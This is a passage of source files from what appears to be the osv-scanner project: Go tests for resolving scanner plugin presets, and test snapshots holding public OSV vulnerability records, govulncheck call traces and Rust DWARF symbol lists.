[]string{composerlock.Name}, disabled: []string{composerlock.Name}, }, want: []string{}, }, // { name: "one_preset_enabled_and_nothing_disabled", args: args{ enabled: []string{"artifact"}, disabled: nil, }, want: []string{ apk.Name, archive.Name, baseimage.Name, cargoauditable.Name, dpkg.Name, gobinary.Name, nodemodules.Name, wheelegg.Name, apkanno.Name, dpkganno.Name, }, }, { name: "one_preset_enabled_and_different_preset_disabled", args: args{ enabled: []string{"artifact"}, disabled: []string{"directory"}, }, want: []string{ apk.Name, archive.Name, baseimage.Name, cargoauditable.Name, dpkg.Name, gobinary.Name, nodemodules.Name, wheelegg.Name, apkanno.Name, dpkganno.Name, }, }, { name: "one_preset_enabled_and_same_preset_disabled", args: args{ enabled: []string{"artifact"}, disabled: []string{"artifact"}, }, want: []string{}, }, { name: "one_preset_enabled_and_some_extractors_disabled", args: args{ enabled: []string{"artifact"}, disabled: []string{wheelegg.Name, archive.Name, cargoauditable.Name}, }, want: []string{ apk.Name, baseimage.Name, dpkg.Name, gobinary.Name, nodemodules.Name, apkanno.Name, dpkganno.Name, }, }, // { name: "multiple_presets_enabled_and_nothing_disabled", args: args{ enabled: []string{"artifact", "directory"}, disabled: []string{}, }, want: []string{ apk.Name, archive.Name, baseimage.Name, cargoauditable.Name, dpkg.Name, gitrepo.Name, gobinary.Name, nodemodules.Name, vendored.Name, wheelegg.Name, apkanno.Name, dpkganno.Name, }, }, // { name: "multiple_extractors_enabled_and_one_disabled_preset", args: args{ enabled: []string{ spdx.Name, archive.Name, gobinary.Name, }, disabled: []string{"sbom"}, }, want: []string{ archive.Name, gobinary.Name, }, }, { name: "multiple_extractors_enabled_and_disabled", args: args{ enabled: []string{ spdx.Name, archive.Name, gobinary.Name, cargoauditable.Name, }, disabled: []string{ cdx.Name, wheelegg.Name, gobinary.Name, apk.Name, apkanno.Name, dpkganno.Name, }, }, want: []string{ spdx.Name, archive.Name, cargoauditable.Name, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := scalibrplugin.Resolve(tt.args.enabled, tt.args.disabled, &cpb.PluginConfig{}) slices.Sort(tt.want) gotNames := make([]string, 0, len(got)) for _, plug := range got { gotNames = append(gotNames, plug.Name()) } slices.Sort(gotNames) if diff := cmp.Diff(tt.want, gotNames); diff != "" { t.Errorf("Resolve() diff (-want +got): %s", diff) } }) } } func TestResolve_Detectors_Presets(t *testing.T) { t.Parallel() for _, preset := range []string{"cis", "govulncheck", "untested", "weakcreds"} { t.Run(preset, func(t *testing.T) { t.Parallel() got := scalibrplugin.Resolve([]string{preset}, []string{}, &cpb.PluginConfig{}) gotNames := make([]string, 0, len(got)) for _, detector := range got { gotNames = append(gotNames, detector.Name()) } slices.Sort(gotNames) testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n")) }) } } func TestResolve_Extractors_Presets(t *testing.T) { t.Parallel() for _, preset := range []string{"sbom", "lockfile", "directory", "artifact"} { t.Run(preset, func(t *testing.T) { t.Parallel() got := scalibrplugin.Resolve([]string{preset}, []string{}, &cpb.PluginConfig{}) gotNames := make([]string, 0, len(got)) for _, extractor := range got { gotNames = append(gotNames, extractor.Name()) } slices.Sort(gotNames) testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n")) }) } } func TestResolve_Enrichers_Presets(t *testing.T) { t.Parallel() for _, preset := range []string{"artifact", "vulns", "licenses", "transitive"} { t.Run(preset, func(t *testing.T) { t.Parallel() got := scalibrplugin.Resolve([]string{preset}, []string{}, &cpb.PluginConfig{}) gotNames := make([]string, 0, len(got)) for _, detector := range got { gotNames = append(gotNames, detector.Name()) } slices.Sort(gotNames) testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n")) }) } } func TestResolve_Annotators_Presets(t *testing.T) { t.Parallel() for _, preset := range []string{"artifact"} { t.Run(preset, func(t *testing.T) { t.Parallel() got := scalibrplugin.Resolve([]string{preset}, []string{}, &cpb.PluginConfig{}) gotNames := make([]string, 0, len(got)) for _, detector := range got { gotNames = append(gotNames, detector.Name()) } slices.Sort(gotNames) testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n")) }) } } ================================================ FILE: internal/scalibrplugin/testmain_test.go ================================================ package scalibrplugin_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/sourceanalysis/__snapshots__/go_test.snap ================================================ [Test_matchAnalysisWithPackageVulns - 1] [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ], "aliases": null, "experimental_analysis": { "GO-2021-0053": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.3.0", "summary": "Improper Input Validation in GoGo Protobuf" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.0" } ] }, { "package": { "name": "github.com/ipfs/go-bitfield", "version": "1.0.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ], "aliases": null, "experimental_analysis": { "GO-2023-1558": { "called": true, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ], "versions": [ "1.0.0" ] } ], "aliases": [ "CVE-2023-23626" ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" }, "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "schema_version": "1.3.0", "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "schema_version": "1.3.0" } ] }, { "package": { "name": "golang.org/x/image", "version": "0.4.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ], "aliases": null, "experimental_analysis": { "GO-2023-1572": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" }, "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "schema_version": "1.3.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/image/tiff", "symbols": [ "Decode", "DecodeConfig", "decoder.ifdUint", "newDecoder" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ], "schema_version": "1.3.0" } ] } ] --- [Test_matchEmptyAnalysisWithPackageVulns - 1] [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.3.0", "summary": "Improper Input Validation in GoGo Protobuf" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.0" } ] }, { "package": { "name": "github.com/ipfs/go-bitfield", "version": "1.0.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ], "versions": [ "1.0.0" ] } ], "aliases": [ "CVE-2023-23626" ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" }, "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "schema_version": "1.3.0", "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "schema_version": "1.3.0" } ] }, { "package": { "name": "golang.org/x/image", "version": "0.4.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" }, "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "schema_version": "1.3.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ], "schema_version": "1.3.0" } ] } ] --- ================================================ FILE: internal/sourceanalysis/__snapshots__/integration_test.snap ================================================ [Test_runGovulncheck - 1] { "GO-2021-0053": [ { "osv": "GO-2021-0053", "fixed_version": "v1.3.2", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1" } ] }, { "osv": "GO-2021-0053", "fixed_version": "v1.3.2", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/plugin/unmarshal" } ] } ], "GO-2023-1558": [ { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0" } ] }, { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0", "package": "github.com/ipfs/go-bitfield" } ] }, { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0", "package": "github.com/ipfs/go-bitfield", "function": "NewBitfield", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 12, "column": 6 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "main", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 16, "column": 22 } } ] } ], "GO-2023-2382": [ { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0" } ] }, { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": "net/http/internal" } ] }, { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": "net/http/internal", "function": "Read", "receiver": "*chunkedReader", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 26 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "readLocked", "receiver": "*body", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 21 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Read", "receiver": "bodyLocked", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 24 } }, { "module": "stdlib", "version": "v1.19.0", "package": "io", "function": "copyBuffer", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 21 } }, { "module": "stdlib", "version": "v1.19.0", "package": "io", "function": "Copy", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 19 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Close", "receiver": "*body", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 19 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "finishRequest", "receiver": "*response", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 17 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "serve", "receiver": "*conn", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 18 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Serve", "receiver": "*Server", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 3 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "ListenAndServe", "receiver": "*Server", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": -1 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "ListenAndServe", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 30 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "main", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 28 } } ] } ] } --- ================================================ FILE: internal/sourceanalysis/__snapshots__/rust_test.snap ================================================ [Test_functionsFromDWARF/Parsing_DWARF_medium.o - 1] { "\u0026T::fmt": {}, "alloc::alloc::Global::deallocate": {}, "alloc::alloc::Global::grow": {}, "alloc::alloc::Global::grow_impl": {}, "alloc::alloc::box_free": {}, "alloc::alloc::dealloc": {}, "alloc::alloc::realloc": {}, "alloc::raw_vec::RawVec::current_memory": {}, "alloc::raw_vec::RawVec::drop": {}, "alloc::raw_vec::RawVec::grow_amortized": {}, "alloc::raw_vec::RawVec::ptr": {}, "alloc::raw_vec::RawVec::reserve_for_push": {}, "alloc::raw_vec::RawVec::set_ptr_and_cap": {}, "alloc::raw_vec::finish_grow": {}, "alloc::raw_vec::handle_reserve": {}, "alloc::rc::is_dangling": {}, "alloc::sync::Arc::drop": {}, "alloc::sync::Arc::drop_slow": {}, "alloc::sync::Arc::get_mut_unchecked": {}, "alloc::sync::Arc::inner": {}, "alloc::sync::Weak::drop": {}, "alloc::sync::Weak::inner": {}, "alloc::vec::Vec::as_mut_ptr": {}, "alloc::vec::Vec::drop": {}, "alloc::vec::Vec::new": {}, "alloc::vec::Vec::push": {}, "arrayvec::ArrayVec::clear": {}, "arrayvec::ArrayVec::drop": {}, "arrayvec::ArrayVec::len": {}, "arrayvec::ArrayVec::pop": {}, "arrayvec::ArrayVec::set_len": {}, "core::alloc::layout::Layout::array": {}, "core::alloc::layout::Layout::array::inner": {}, "core::alloc::layout::Layout::for_value_raw": {}, "core::cmp::Ord::max": {}, "core::cmp::max": {}, "core::core_arch::x86::sse2::mm_load_si128": {}, "core::core_arch::x86::sse2::mm_movemask_epi8": {}, "core::fmt::Arguments::new_v1": {}, "core::fmt::Arguments::new_v1_formatted": {}, "core::fmt::num::\u003cimpl core::fmt::Debug for i32\u003e::fmt": {}, "core::fmt::num::\u003cimpl core::fmt::Debug for usize\u003e::fmt": {}, "core::mem::drop": {}, "core::mem::maybe_uninit::MaybeUninit::assume_init": {}, "core::mem::size_of_val_raw": {}, "core::num::\u003cimpl isize\u003e::wrapping_neg": {}, "core::num::\u003cimpl 